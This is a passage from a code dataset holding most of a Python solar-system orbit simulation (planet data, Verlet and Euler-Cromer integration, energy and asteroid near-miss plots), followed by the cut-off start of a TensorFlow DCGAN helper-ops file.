\"earth\"\n self.data[\"earth\"] = [1, 1, 1, 0, 0, 2*math.pi, \"#3498db\"]\n\n def add_mars(self):\n \"\"\"Add mars to solarsystem\"\"\"\n self._size += 1\n self.mars = _round_object()\n self.mars.name = \"mars\"\n self.data[\"mars\"] = [0.107, 0.53, 1.52, 0, 0, (24.097/29.78)*(2*math.pi), \"red\"]\n\n def add_jupiter(self):\n \"\"\"Add jupiter to solarsystem\"\"\"\n self._size += 1\n self.jupiter = _round_object()\n self.jupiter.name = \"jupiter\"\n self.data[\"jupiter\"] = [318, 10.97, 5.2, 0, 0, (13.07/29.78)*(2*math.pi), \"#f0b27a\"]\n\n def add_saturn(self):\n \"\"\"Add saturn to solarsystem\"\"\"\n self._size += 1\n self.saturn = _round_object()\n self.saturn.name = \"saturn\"\n self.data[\"saturn\"] = [95.159, 58232/6371, 9.58, 0, 0, (9.68/29.78)*(2*math.pi), \"#af601a\"]\n\n def add_uranus(self):\n \"\"\"Add uranus to solarsystem\"\"\"\n self._size += 1\n self.uranus = _round_object()\n self.uranus.name = \"uranus\"\n self.data[\"uranus\"] = [14.536, 4, 19.21, 0, 0, (6.8/29.78)*(2*math.pi), \"#85c1e9\"]\n\n def add_neptune(self):\n \"\"\"Add saturn to solarsystem\"\"\"\n self._size += 1\n self.neptune = _round_object()\n self.neptune.name = \"neptune\"\n self.data[\"neptune\"] = [17.147, 24622/6371, 30.07, 0, 0, (5.43/29.78)*(2*math.pi), \"#1f618d\"]\n\n def add_asteroid(self):\n \"\"\"Add asteroid to solarsystem\"\"\"\n self._size += 1\n self.asteroid = _round_object()\n self.asteroid.name = \"asteroid\"\n self.data[\"asteroid\"] = [0.01, 1, 0.74854, -12.004, 0, 4*math.pi, \"#b2babb\"]\n\n def get_size(self):\n return self._size\n\n def healthy(self):\n \"\"\"Unit testing\"\"\"\n assert self._size >= 0\n #Assert mass and radius > 0\n\n class _round_object(solarsystem_object):\n \"\"\"Create a round object used as planets, stars and asteroids\"\"\"\n def __init__(self):\n\n self.mass = None\n self.radius = None\n self.name = \"None\"\n self.colour = \"None\"\n\n self.xposition = 0\n self.yposition = 0\n self.xspeed = 0\n self.yspeed = 0\n self.xacceleration = 0\n self.yacceleration = 0\n\n self.xposition_list = []\n self.yposition_list = []\n self.xspeed_list = []\n self.yspeed_list = []\n self.xacceleration_list = []\n self.yacceleration_list = []\n\n self.total_energy_list = []\n self.potential_energy_list = []\n self.kinetic_energy_list = []\n\n\n def create_solarsystem(body_list=None):\n \"\"\"Create solarsystem object with planets\"\"\"\n\n solarsystem = solarsystem_object()\n\n # for bodyindex in range(len(solarsystem.data)):\n # print(\"Index nummer\", bodyindex)\n # solarsystem.add_body(bodyindex)\n\n if body_list == None: body_list = [\"sun\", \"mercury\", \"venus\", \"earth\", \"mars\", \"jupiter\", \"saturn\", \"uranus\", \"neptune\", \"asteroid\"]\n\n for body in body_list:\n if body == \"sun\":\n solarsystem.add_sun()\n elif body == \"mercury\":\n solarsystem.add_mercury()\n elif body == \"venus\":\n solarsystem.add_venus()\n elif body == \"earth\":\n solarsystem.add_earth()\n elif body == \"mars\":\n solarsystem.add_mars()\n elif body == \"jupiter\":\n solarsystem.add_jupiter()\n elif body == \"saturn\":\n solarsystem.add_saturn()\n elif body == \"uranus\":\n solarsystem.add_uranus()\n elif body == \"neptune\":\n solarsystem.add_neptune()\n elif body == \"asteroid\":\n solarsystem.add_asteroid()\n\n getattr(solarsystem, str(body)).mass = solarsystem.data[body][0] # --> solarsystem.sun.mass = 333000\n getattr(solarsystem, str(body)).radius = solarsystem.data[body][1]\n getattr(solarsystem, str(body)).xposition = solarsystem.data[body][2]\n getattr(solarsystem, str(body)).yposition = solarsystem.data[body][3]\n getattr(solarsystem, str(body)).xspeed = solarsystem.data[body][4]\n getattr(solarsystem, str(body)).yspeed = solarsystem.data[body][5]\n getattr(solarsystem, str(body)).colour = solarsystem.data[body][6]\n\n return solarsystem\n\n # def simulate(solarsystem, integrator):\n # \"\"\"Simulate solarsystem and return dictionary with visited planet trajectory coordinates and dictionary with past planet velocities\"\"\"\n # global dt\n # global steps\n # global years\n # global hour_step\n # hour_step = 10\n # years = 1\n # dt = hour_step/(365*24)\n # steps = int(years/dt)\n #\n # for body in solarsystem.data:\n # getattr(solarsystem, str(body)).xposition_list.append(getattr(solarsystem, str(body)).xposition)\n # getattr(solarsystem, str(body)).yposition_list.append(getattr(solarsystem, str(body)).yposition)\n # getattr(solarsystem, str(body)).xspeed_list.append(getattr(solarsystem, str(body)).xspeed)\n # getattr(solarsystem, str(body)).yspeed_list.append(getattr(solarsystem, str(body)).yspeed)\n # getattr(solarsystem, str(body)).xacceleration_list.append(getattr(solarsystem, str(body)).xacceleration)\n # getattr(solarsystem, str(body)).yacceleration_list.append(getattr(solarsystem, str(body)).yacceleration)\n #\n # for i in range(steps):\n # solarsystem.time += dt\n # for body in solarsystem.data:\n # update(getattr(solarsystem, str(body)), integrator)\n # getattr(solarsystem, str(body)).xposition_list.append(getattr(solarsystem, str(body)).xposition)\n # getattr(solarsystem, str(body)).yposition_list.append(getattr(solarsystem, str(body)).yposition)\n # getattr(solarsystem, str(body)).xspeed_list.append(getattr(solarsystem, str(body)).xspeed)\n # getattr(solarsystem, str(body)).yspeed_list.append(getattr(solarsystem, str(body)).yspeed)\n # getattr(solarsystem, str(body)).xacceleration_list.append(getattr(solarsystem, str(body)).xacceleration)\n # getattr(solarsystem, str(body)).yacceleration_list.append(getattr(solarsystem, str(body)).yacceleration)\n #\n #\n # ### REMOVE LATER ###\n # # if i == steps/2 and body == \"earth\":\n # # print(body, \"xposition is\", solarsystem.earth.xposition)\n # # print(body, \"yposition is\", solarsystem.earth.yposition)\n # # print(\"asteroid xposition is\", solarsystem.asteroid.xposition)\n # # print(\"asteroid yposition is\", solarsystem.asteroid.yposition)\n # # return position_dict, velocity_dict\n #\n # ## ###\n #\n # return None\n\n # def draw(inner = True):\n # \"\"\"Plot all planets' trajectory\"\"\"\n #\n # for body in solarsystem.data:\n #\n # # Change axis to million miles\n # # getattr(solarsystem, str(body)).yposition_list = [x * 92.955807 for x in getattr(solarsystem, str(body)).yposition_list]\n # # getattr(solarsystem, str(body)).yposition_list = [x * 92.955807 for x in getattr(solarsystem, str(body)).yposition_list]\n #\n # ax.plot(getattr(solarsystem, str(body)).xposition_list,getattr(solarsystem, str(body)).yposition_list, color=getattr(solarsystem, str(body)).colour, linestyle='solid', markersize = 2)\n # ax.plot(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1], color=getattr(solarsystem, str(body)).colour, marker = \"o\", markersize = 0.08*getattr(solarsystem, str(\"sun\")).radius + 0.9*math.log(getattr(solarsystem, str(body)).radius/getattr(solarsystem, str(\"sun\")).radius))\n #\n # # Add tetboxes for objects\n # if body == \"asteroid\":\n # ax.text(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1]+0.1, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n # else:\n # if inner == True:\n # arc_percent = int(0.8*len(getattr(solarsystem, str(body)).xposition_list))\n # ax.text(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1]+0.1, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n #\n # # if body == \"jupiter\":\n # # ax.text(getattr(solarsystem, str(body)).xposition_list[arc_percent],getattr(solarsystem, str(body)).yposition_list[arc_percent]+0.5, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n # # elif body == \"mercury\":\n # # ax.text(getattr(solarsystem, str(body)).xposition_list[arc_percent],getattr(solarsystem, str(body)).yposition_list[arc_percent]+0.5, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n # # else:\n # # ax.text(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1]+0.1, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n #\n # elif inner == False:\n # ax.text(getattr(solarsystem, str(body)).xposition_list[4000],getattr(solarsystem, str(body)).yposition_list[4000]+0.2, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n #\n #\n # plt.show(block=True)\n\n def animate(x_list, y_list, colour):\n \"\"\"Continually draw animation\"\"\"\n plt.plot(x_list,y_list, color=colour, linestyle='solid', markersize = 2)\n plt.show(block=False)\n plt.pause(0.00000000000000000001)\n\n # def update(obj, integrator):\n # \"\"\"Update position\"\"\"\n #\n # x_force, y_force = forcefunction(obj)\n #\n # if integrator == \"Verlet\":\n # _update_verlet(obj,[x_force,y_force])\n #\n # elif integrator == \"EC\":\n # _update_EC(obj,[x_force,y_force])\n #\n # def _update_EC(obj, forcevector):\n # \"\"\"Update position with euler cromer integration\"\"\"\n #\n # obj.xacceleration = forcevector[0] / obj.mass\n # obj.yacceleration = forcevector[1] / obj.mass\n #\n # obj.xspeed += obj.xacceleration*dt\n # obj.yspeed += obj.yacceleration*dt\n #\n # obj.xposition += obj.xspeed * dt\n # obj.yposition += obj.yspeed * dt\n #\n # def _update_verlet(obj, forcevector):\n # \"\"\"Update position with Verlet integration\"\"\"\n #\n # obj.xacceleration = forcevector[0] / obj.mass\n # obj.yacceleration = forcevector[1] / obj.mass\n #\n # #Integrator\n #\n # obj.xposition = obj.xposition + obj.xspeed * dt + 0.5*obj.xacceleration*dt*dt\n # obj.yposition = obj.yposition + obj.yspeed * dt + 0.5*obj.yacceleration*dt*dt\n #\n # new_x_force, new_y_force = forcefunction(obj)\n #\n # new_obj_x_acceleration = new_x_force/obj.mass\n # new_obj_y_acceleration = new_y_force/obj.mass\n #\n # obj.xspeed += 0.5*(new_obj_x_acceleration+obj.xacceleration)*dt\n # obj.yspeed += 0.5*(new_obj_y_acceleration+obj.yacceleration)*dt\n #\n # def forcefunction(obj):\n # \"\"\"Calculate force on object and return force in x and y direction\"\"\"\n # x_force = 0\n # y_force = 0\n # for body in solarsystem.data:\n # if body == obj.name: #Do not want force on itself\n # continue\n #\n # # if body != \"sun\": #Only sun exerts force\n # # continue\n #\n # forcevector = _forcefunction(obj, getattr(solarsystem, str(body)))\n # x_force += forcevector[0]\n # y_force += forcevector[1]\n #\n # return x_force, y_force\n #\n # def _forcefunction(obj1, obj2):\n # \"\"\"Calculate and return the mutual attracting force between object 1 and object 2 in list [F1, F2] where F1 is x-force and y-force in direction from obj1 to obj2 and F2 is in direction from obj2 to obj1\"\"\"\n # global G\n # G = 39.478 / (333000) # Unit: (astronomisk enhet kub) per (år kvadrat) per (jordens massa)\n # r = [obj2.xposition - obj1.xposition, obj2.yposition- obj1.yposition] #Unit vector from obj1 to obj2\n # distance_squared = r[0]**2+r[1]**2\n # r_hat = [r[0]/(distance_squared**0.5), r[1]/(distance_squared**0.5)]\n # force = G*obj1.mass*obj2.mass/distance_squared\n # return [r_hat[0]*force,r_hat[1]*force]\n\n # def energy_results():\n # \"\"\"Generate energy result figures\"\"\"\n # global hour_step\n # global hour_list\n # global solarsystem\n # energy_canvas()\n # hour_list = [1,48,96]\n #\n # for hour_step in hour_list:\n # for integrator in [\"EC\",\"Verlet\"]:\n #\n # if integrator == \"EC\":\n # continue\n # integrator_string = \"Euler-Cromer\"\n # else:\n # integrator_string = \"Verlet\"\n #\n # solarsystem = create_solarsystem()\n # simulate(solarsystem, str(integrator))\n #\n # # solarsystem_canvas_setup(integrator_string)\n # # asteroid_earth()\n # # draw()\n #\n # for body in solarsystem.data:\n # assert len(getattr(solarsystem, str(body)).total_energy_list) == len(getattr(solarsystem, str(body)).potential_energy_list) == len(getattr(solarsystem, str(body)).kinetic_energy_list) == 0\n #\n # if body != \"earth\":\n # continue\n #\n # energy_lists(getattr(solarsystem, str(body)))\n #\n # #Generate error lists\n # start_energy_total = getattr(solarsystem, str(body)).total_energy_list[0]\n # getattr(solarsystem, str(body)).total_energy_list = [abs((x-start_energy_total)/start_energy_total) for x in getattr(solarsystem, str(body)).total_energy_list]\n # earth_ax.set_title(\"Earths relative total energy error using Verlet integration.\" + \"\\n\" + \"Different time steps are displayed\", fontsize=30)\n #\n #\n # plot_energy_EC_vs_Verlet(getattr(solarsystem, str(body)), \"total\", integrator)\n # # plot_energy_EC_vs_Verlet(getattr(solarsystem, str(body)), \"potential\", integrator)\n # # plot_energy_EC_vs_Verlet(getattr(solarsystem, str(body)), \"kinetic\", integrator)\n # getattr(solarsystem, str(body)).total_energy_list = []\n # getattr(solarsystem, str(body)).potential_energy_list = []\n # getattr(solarsystem, str(body)).kinetic_energy_list = []\n #\n #\n # plt.show()\n #\n # def plot_energy_EC_vs_Verlet(obj, type, integrator):\n # \"\"\"Plot the graphs\"\"\"\n #\n # iterations = np.arange(0, years + 0.1*hour_step/(24*365), hour_step/(24*365)) # Years on x-axis\n # # obj.potential_energy_list = [x*1000 for x in obj.potential_energy_list]\n # if integrator == \"EC\":\n # if hour_step == hour_list[0]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#f0b27a\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n #\n # elif hour_step == hour_list[1]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n #\n # elif hour_step == hour_list[2]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n #\n # elif integrator == \"Verlet\":\n # if hour_step == hour_list[0]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#f0b27a\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n #\n # elif hour_step == hour_list[1]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n #\n # elif hour_step == hour_list[2]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # earth_ax.legend(prop={'size': 20})\n #\n # def energy_lists(obj):\n # \"\"\"Fill all lists of total, potential and kinetic energy\"\"\"\n #\n # assert len(obj.xposition_list) == len(obj.yposition_list) == len(obj.xspeed_list) == len(obj.yspeed_list)\n # for i in range(len(obj.xposition_list)):\n # x_position = obj.xposition_list[i]\n # y_position = obj.yposition_list[i]\n # x_speed = obj.xspeed_list[i]\n # y_speed = obj.yspeed_list[i]\n #\n # kinetic_energy = 0.5*obj.mass*(x_speed**2+y_speed**2)\n # # Calculating potential energy\n # potential_energy = 0\n # for M in solarsystem.data:\n # if obj.name == M: #Do not want energy from itself\n # continue\n # r = [x_position - getattr(solarsystem, str(M)).xposition_list[i], y_position - getattr(solarsystem, str(M)).yposition_list[i]] #Unit vector from body to M\n # distance = (r[0]**2+r[1]**2)**0.5\n # potential_energy += -1*G*getattr(solarsystem,str(M)).mass*obj.mass / distance\n #\n # total_energy = potential_energy + kinetic_energy\n #\n # obj.total_energy_list.append(total_energy)\n # obj.potential_energy_list.append(potential_energy)\n # obj.kinetic_energy_list.append(kinetic_energy)\n # return\n #\n # def energy_canvas(type=\"earth\"):\n # \"\"\"Setup energy canvas\"\"\"\n # if type == \"earth\":\n # global earth_fig, earth_ax\n # earth_fig, earth_ax = plt.subplots()\n # earth_ax.set_facecolor(\"#17202a\")\n # earth_ax.tick_params(axis='x', labelsize=20)\n # earth_ax.tick_params(axis='y', labelsize=20)\n # earth_ax.set_xlabel('Time [Earth-years]', fontsize=28)\n # unitstr = r'$Earthmass \\times \\frac{{AU}^2}{{Earthyear}^2}}^2}$'\n # # earth_ax.set_ylabel('Energy ['+unitstr+']', fontsize=28)\n # earth_ax.set_ylabel('Relative total energy error', fontsize=28)\n #\n # earth_ax.set(ylim=(-80, 80))\n #\n # # Set title\n # earth_ax.set_title(\"Total energy using Verlet integration.\" + \"\\n\" + \"Different time steps are displayed\", fontsize=30)\n # earth_ax.set_title(\"Total energy using Euler-Cromer integration.\" + \"\\n\" + \"Different time steps are displayed\", fontsize=30)\n #\n #\n # elif type == \"solarsystem\":\n # global system_fig, system_ax\n # system_fig, system_ax = plt.subplots()\n # system_ax.set_facecolor(\"#17202a\")\n\n def asteroid_results():\n \"\"\"Plotting the results\"\"\"\n asteroid_canvas()\n distance_list, acceleration_list, earth_displacement = asteroid_earth()\n iterations = np.arange(0, years*24*365+0.3*hour_step, hour_step)\n iterations = np.arange(0, years + 0.1*hour_step/(24*365), hour_step/(24*365))\n\n ast_ax.plot(iterations, distance_list, color = \"#5D6D7E\")\n ast2_ax.plot(iterations, earth_displacement, color = \"blue\")\n plt.show()\n\n def asteroid_canvas():\n \"Setup canvas\"\n global ast_fig, ast_ax, ast2_ax\n\n ast_fig, ast_ax = plt.subplots()\n ast_ax.set_facecolor(\"#17202a\")\n ast_ax.tick_params(axis='x', labelsize=20)\n ast_ax.tick_params(axis='y', labelsize=20)\n ast_ax.set_xlabel('Time [Hours]', fontsize=28)\n ast_ax.set_ylabel(\"Asteroid distance to earth [AU]\", fontsize=28)\n ast_ax.tick_params(axis='y', labelcolor=\"#5D6D7E\")\n\n\n ast2_ax = ast_ax.twinx()\n ast2_ax.tick_params(axis='x', labelsize=20)\n ast2_ax.tick_params(axis='y', labelsize=20, color=solarsystem.earth.colour)\n # ast2_ax.set_ylabel('Acceleration on earth ['+ r'$\\frac{AU}{{Earthyear}^2}$' +\"]\", fontsize=28)\n ast2_ax.set_ylabel('Earths relative displacement', fontsize=28)\n\n ast2_ax.tick_params(axis='y', labelcolor= \"blue\")\n\n # Set title\n ast_ax.set_title(\"Near miss for Earth and Asteroid with mass \"+str(solarsystem.asteroid.mass) + \" times that of Earths \\n\" + \"Time step = 10 minutes\", fontsize=30)\n ast_ax.set_title(\"Near miss for Earth and Asteroid with mass \"+str(solarsystem.asteroid.mass) + \" times that of Earths \\n\" + \"Time step = \"+ str(hour_step) + \" hour\", fontsize=30)\n\n def asteroid_earth():\n\n distance_list = []\n acceleration_list = [] #Acceleration on asteroid\n earth_displacement = [] #Earth displacement because of asteroid\n\n biggest_acceleration = 0\n time_of_biggest_acceleration = None\n\n shortest_distance = 10**100 # Random big number\n time_of_shortest_distance = None\n\n assert len(solarsystem.asteroid.xposition_list) == len(solarsystem.asteroid.yposition_list) == len(solarsystem.earth.xposition_list) == len(solarsystem.earth.yposition_list)\n for i in range(len(getattr(solarsystem, str(solarsystem.asteroid.name)).xposition_list)):\n\n #Distance\n r = np.sqrt((solarsystem.asteroid.xposition_list[i] - solarsystem.earth.xposition_list[i])**2 + (solarsystem.asteroid.yposition_list[i] - solarsystem.earth.yposition_list[i])**2)\n distance_list.append(r)\n\n #Acceleration\n acceleration = np.sqrt(solarsystem.earth.xacceleration_list[i]**2 + solarsystem.earth.xacceleration_list[i]**2)\n acceleration_list.append(acceleration)\n\n #Earth's deviation\n expected_r = [np.cos(2*math.pi*i*dt),np.sin(2*math.pi*i*dt)]\n actual_r = [solarsystem.earth.xposition_list[i], solarsystem.earth.yposition_list[i]]\n displacement = np.sqrt((expected_r[0]-actual_r[0])**2 +(expected_r[1]-actual_r[1])**2)\n earth_displacement.append(displacement/np.sqrt(expected_r[0]**2 + expected_r[1]**2))\n\n if r < shortest_distance:\n shortest_distance = r\n time_of_shortest_distance = (i+1)*dt\n if acceleration > biggest_acceleration:\n biggest_acceleration = acceleration\n time_of_biggest_acceleration = (i+1)*dt\n\n print(\"Shortest distance is\", shortest_distance, \"at time\", time_of_shortest_distance)\n print(\"Biggest acceleration is\", biggest_acceleration, \"at time\", time_of_biggest_acceleration)\n return distance_list, acceleration_list, earth_displacement\n\n # def solarsystem_canvas_setup(integrator_string, length=\"AU\", size=\"large\"):\n # \"\"\"Setting up canvas\"\"\"\n # global fig\n # global ax\n # fig, ax = plt.subplots()\n #\n #\n # ax.set_facecolor(\"#17202a\")\n # if hour_step == 1:\n # ax.set_title(\"Solar system simulation with \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = \"+ str(hour_step) + \" hour\", fontsize=30)\n # else:\n # # ax.set_title(\"Asteroid with mass of Uranus using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n # # ax.set_title(\"Asteroid with mass of Jupiter using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n # # ax.set_title(\"Asteroid with one tenth of the mass of the sun. Simulated using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n # ax.set_title(\"Asteroid with the mass of the sun. Simulated using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n #\n #\n # # ax.set_title(\"Asteroid near miss with \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Time step = 10 minutes\", fontsize=30)\n # # ax.set_title(\"Asteroid near miss with \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n #\n #\n #\n # ax.tick_params(axis='x', labelsize=20)\n # ax.tick_params(axis='y', labelsize=20)\n #\n # if length == \"miles\":\n # ax.set_xlabel('Distance [Million Miles]', fontsize=28)\n # ax.set_ylabel('Distance [Million Miles]', fontsize=28)\n # else:\n # ax.set_xlabel('Distance [AU]', fontsize=28)\n # ax.set_ylabel('Distance [AU]', fontsize=28)\n #\n # if size == \"small\":\n # ax.set(xlim=(0.66, 0.68), ylim=(-0.76, -0.74))\n # else:\n # ax.set(xlim=(-32, 32), ylim=(-32, 32))\n\n\n\n #[mass (eathmasses), radius (eathradiuses), x-position (Astronomical units), y-position (Astronomical units), x-speed (AU per earth-year), y-speed (AU per earth-year), colour]\n # global solarsystem.data\n # solarsystem.data = {\n # \"sun\": [333000, 109, 0, 0, 0, 0, \"#f7dc6f\"],\n # \"mercury\": [0.055, 0.3829, 0.387, 0, 0, (47.362/29.78)*(2*math.pi), \"#b2babb\"],\n # \"venus\": [0.815, 0.95, 0.72, 0, 0, (35.02/29.78)*(2*math.pi), \"#f9e79f\"],\n # \"earth\": [1, 1, 1, 0, 0, 2*math.pi, \"#3498db\"],\n # \"mars\": [0.107, 0.53, 1.52, 0, 0, (24.097/29.78)*(2*math.pi), \"red\"],\n # \"jupiter\": [318, 10.97, 5.2, 0, 0, (13.07/29.78)*(2*math.pi), \"#f0b27a\"],\n # \"saturn\": [95.159, 58232/6371, 9.58, 0, 0, (9.68/29.78)*(2*math.pi), \"#af601a\"],\n # \"uranus\": [14.536, 4, 19.21, 0, 0, (6.8/29.78)*(2*math.pi), \"#85c1e9\"],\n # \"neptune\": [17.147, 24622/6371, 30.07, 0, 0, (5.43/29.78)*(2*math.pi), \"#1f618d\"],\n # \"asteroid\": [0.01, 1, 0.74854, -12.004, 0, 4*math.pi, \"#b2babb\"] #Near earth\n # }\n\n integrator = \"EC\"\n integrator_string = \"Euler-Cromer\"\n integrator = \"Verlet\"\n integrator_string = \"Verlet\"\n\n solarsystem = create_solarsystem()\n import importlib\n simulate = importlib.import_module(\"simulate\")\n simulate.simulate(solarsystem, integrator)\n # simulate(solarsystem, str(integrator))\n graphics = importlib.import_module(\"graphics\")\n graphics.solarsystem_canvas_setup(solarsystem, integrator_string)\n graphics.draw(solarsystem)\n # asteroid_results()\n # energy_results()\n\n\n\n\nif __name__ == \"__main__\": main()\n\n\n\n\n# TODO\n# Move energy related functions to another file\n# Create animation\n# Create GUI (includes tidying code for canvas setup amongst others)\n# Create API that fetch real life data\n# Create 3D animation\n\n\n\n# IDEAS\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":31855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383043614","text":"\"\"\"\nMost codes from https://github.com/carpedm20/DCGAN-tensorflow\n\"\"\"\nimport math\nimport numpy as np \nimport tensorflow as tf\n\nfrom tensorflow.python.framework import ops\n\nfrom utils import *\n\nif \"concat_v2\" in dir(tf):\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat_v2(tensors, axis, *args, **kwargs)\nelse:\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat(tensors, axis, *args, **kwargs)\n\ndef bn(x, is_training, scope):\n return tf.contrib.layers.batch_norm(x,\n decay=0.9,\n updates_collections=None,\n epsilon=1e-5,\n scale=True,\n is_training=is_training,\n scope=scope)\n\ndef conv_out_size_same(size, stride):\n return int(math.ceil(float(size) / float(stride)))\n\ndef conv_cond_concat(x, y):\n \"\"\"Concatenate conditioning vector on feature map axis.\"\"\"\n x_shapes = x.get_shape()\n y_shapes = y.get_shape()\n return concat([x, y*tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])], 3)\n\ndef conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02, name=\"conv2d\"):\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\n\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n\n return conv\n\ndef deconv2d(input_, output_shape, k_h=5, k_w=5, d_h=2, d_w=2, name=\"deconv2d\", stddev=0.02, with_w=False):\n with tf.variable_scope(name):\n # filter : [height, width, output_channels, in_channels]\n w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n\n try:\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape, strides=[1, d_h, d_w, 1])\n\n # Support for verisons of TensorFlow before 0.7.0\n except AttributeError:\n deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape, strides=[1, d_h, d_w, 1])\n\n biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n\n if with_w:\n return deconv, w, biases\n else:\n return deconv\n\ndef lrelu(x, leak=0.2, name=\"lrelu\"):\n return tf.maximum(x, leak*x)\n\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\n shape = input_.get_shape().as_list()\n\n with tf.variable_scope(scope or \"Linear\"):\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\n tf.random_normal_initializer(stddev=stddev))\n bias = tf.get_variable(\"bias\", [output_size],\n initializer=tf.constant_initializer(bias_start))\n if with_w:\n return tf.matmul(input_, matrix) + bias, matrix, bias\n else:\n return tf.matmul(input_, matrix) + bias\n\n\ndef gru(previous_hidden_state, x, scope=None):\n\n with tf.variable_scope(scope or \"GRU\"):\n\n #TODO - can be accelerated (?)\n\n input_shape = 